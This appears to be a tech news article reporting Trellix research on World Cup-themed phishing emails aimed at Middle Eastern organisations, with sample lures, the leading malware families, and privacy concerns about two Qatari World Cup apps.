This article is more than 1 year old

World Cup phishing emails spike in Middle Eastern countries

That's where the money is

Phishing attempts targeting victims in the Middle East increased 100 percent last month in the lead up to the World Cup in Qatar, according to security shop Trellix.

Its researchers documented a spike in these email-based attacks between September and October, when the volume of malicious emails doubled. Miscreants used FIFA and other football-related lures as the initial attack vector, and the security researchers detailed several email samples they found in the wild. 

In one, the email purported to be from the FIFA transfer matching system (TMS) helpdesk and included a fake alert that the user's two-factor authentication had been deactivated. It then directed the user to an attacker-controlled website, which allows the crooks to then steal the users' credentials.

Another scam email impersonated David Firisua, the team manager for Auckland City FC, and requested confirmation of a FIFA payment, while yet another phish impersonated the FIFA ticketing office and tried to trick a victim into "urgently resolving" a payment issue by clicking on a malicious HTML attachment.

Trellix's phishing net also caught emails spoofing Snoonu, the official food delivery partner of the World Cup, that offered fake free match tickets and contained a malicious xlsm attachment.

"It is a common practice for attackers to utilize the important/popular events as a part of the social engineering tactics and particularly target the organizations which are related to events and more promising victims for the attack," the researchers warned.

Trellix also highlighted World Cup-themed phishing pages that look like the legitimate FIFA pages they spoof, and warned that miscreants are using "multiple phishing kits where the post URL is either obfuscated, Base64 encoded or present in the ajax request instead of form action tags."

Additionally, the top five malware families being used to target Middle Eastern countries are Qakbot (40 percent), Emotet (26 percent), Formbook (26 percent), Remcos (4 percent) and QuadAgent (4 percent), according to the security researchers.

And in a separate document [PDF], Trellix listed malicious URLs, binaries and email addresses used in these recent World Cup-themed campaigns.

Trellix expects these phishing attacks to continue through January 2023, and noted that organizations directly related to the football tournament should remain "extra-vigilant." 

Phished, snooped, or jailed?

Of course, the nearly 3 million people who bought tickets to attend a match in Qatar have a whole other set of cybersecurity threats to worry about once they are in the country — in addition to a litany or moral and ethical concerns related to attending the World Cup in a country with a horrible human rights' record that built its stadiums using migrant workers whose treatment has been described as "modern slavery."

Two World Cup apps have come under increased scrutiny from security researchers and various countries' data protection agencies, which have labeled the apps spyware and encouraged visits to use burner phones.

The two apps are Ehteraz, a Covid-19 tracker from the Qatari Ministry of Public Health, and Hayya from the government's Supreme Committee for Delivery & Legacy overseeing the Cup locally, which allows ticket holders entry into the stadiums and access to free metro and bus transportation services.

All of which makes watching the matches from the comfort of your own couch, where you can drink a beer and kiss your partner without fear of getting arrested, sound increasingly appealing. ®

More about


Send us news

Other stories you might like